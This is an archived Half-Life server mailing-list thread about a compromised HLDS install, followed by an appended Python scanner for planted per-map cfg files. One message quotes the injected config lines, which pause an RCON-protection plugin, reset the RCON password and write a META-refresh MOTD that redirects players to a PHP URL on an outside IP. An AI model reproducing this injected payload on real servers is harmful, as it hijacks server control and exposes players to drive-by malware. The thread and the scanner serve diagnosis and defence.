It's pretty much certain that he's got an AMX plugin with a security hole
in it.



On Thu, Jan 3, 2013 at 8:10 AM, Bjorn Wielens <[email protected]> wrote:

> Interesting. I was under the impression that RCON can't make permanent
> server config changes (i.e. write to config files) - I thought it was only
> limited to being able to change current cvars in memory, which would be
> wiped the next time a config changes them.
>
> Have I got that wrong?
>
> If not, I'd suspect the attack vector is probably not via RCON... more
> likely an exploit via a file upload mechanism or so (sprays?) to get the
> malicious .cfg there in the first place.
> Sadly the redirected URL doesn't respond for me, so I can't take a look
> and see what they were attempting to do with it. (more than likely a
> drive-by malware install or something).
>
> ________________________________
>  From: Collin Howard <[email protected]>
> To: Half-Life dedicated Linux server mailing list <
> [email protected]>
> Sent: Wednesday, January 2, 2013 3:23:33 PM
> Subject: Re: [hlds_linux] Remote connection with rcon
>
> Looks like there might be a new exploit or hack. Somehow, someone was able
> to create a maps folder in my amxmodx config folder, create map-specific
> cfg files and add the following lines to them:
>
> amxx pause rcon_defencer.amxx
> rcon_password "56425642"
> motdfile motd.txt
> motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=
> http://78.110.63.117//abunaimo.php?jecttely=674660";>
>
> I don't use ftp on the box, the only access to the box is via ssh, the ssh
> port is a completely random port and the password is a 25+ character
> completely random password. So I don't think anyone could have gained access
> to the box directly to do this. Is there a known exploit or hack that does
> this? This was done with only one HLDS setup on the box while the other
> HLDS setups were not affected. These files are what were causing my issue
> of not being able to remotely connect with the rcon specified in server.cfg.
>
>
>
> ________________________________
> From: Ken Bateman <[email protected]>
> To: Collin Howard <[email protected]>; Half-Life dedicated Linux server
> mailing list <[email protected]>
> Sent: Tuesday, January 1, 2013 1:43:32 AM
> Subject: Re: [hlds_linux] Remote connection with rcon
>
>
> On Tue, Jan 1, 2013 at 1:15 AM, Collin Howard <[email protected]> wrote:
>
> From the looks of it, server.cfg is not automatically executing when the
> map changes and even when I restart the hlds. Anyone have a clue on what's
> going on? Doing exec server.cfg in console executed the config file and
> rcon started working. Any ideas?
> >
>
> Is servercfgfile set to "server.cfg"?  Is it being set to something
> different on the command line or in autoexec.cfg?
>
> -Ken
> _______________________________________________
> To unsubscribe, edit your list preferences, or view the list archives,
> please visit:
> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
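Added example, not part of the original thread or of any poster's own tooling: a small Python scanner that flags the directives quoted above (`amxx pause`, `rcon_password`, `motdfile`, `motd_write`, and a META refresh) in `.cfg` files under a per-map config directory, where none of them is normally expected. The directory passed in, the sample file names and the sample values are constructed assumptions.

```python
import re
import tempfile
from pathlib import Path

# Directives taken from the planted per-map cfg quoted in the thread.
RULES = {
    "rcon_password": re.compile(r"^\s*rcon_password\b", re.I),
    "motd_write": re.compile(r"^\s*motd_write\b", re.I),
    "motdfile": re.compile(r"^\s*motdfile\b", re.I),
    "amxx pause": re.compile(r"^\s*amxx\s+pause\b", re.I),
    "meta refresh": re.compile(r'http-equiv\s*=\s*"?refresh', re.I),
}


def scan_cfg_tree(root):
    """Return (relative path, line number, rule) for each hit in *.cfg under root."""
    root = Path(root)
    hits = []
    for cfg in sorted(root.rglob("*.cfg")):
        lines = cfg.read_text(errors="replace").splitlines()
        for lineno, line in enumerate(lines, 1):
            for rule, rx in RULES.items():
                # The ^-anchored rules ignore lines commented out with //.
                if rx.search(line):
                    hits.append((cfg.relative_to(root).as_posix(), lineno, rule))
    return hits


def build_sample(root):
    """Constructed sample: one planted map cfg and one benign map cfg."""
    maps = Path(root) / "maps"
    maps.mkdir(parents=True)
    (maps / "de_dust2.cfg").write_text(
        "amxx pause rcon_defencer.amxx\n"
        'rcon_password "CONSTRUCTED"\n'
        "motdfile motd.txt\n"
        'motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=\n'
        'http://example.invalid/x.php";>\n'
    )
    (maps / "cs_office.cfg").write_text(
        "mp_timelimit 20\n// rcon_password is set in server.cfg\n"
    )


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, lineno, rule in scan_cfg_tree(tmp):
            print(f"{path}:{lineno}: {rule}")
```

Run against the whole server tree it will also report the legitimate `rcon_password` line in server.cfg, so scope it to the per-map directory or filter known-good files.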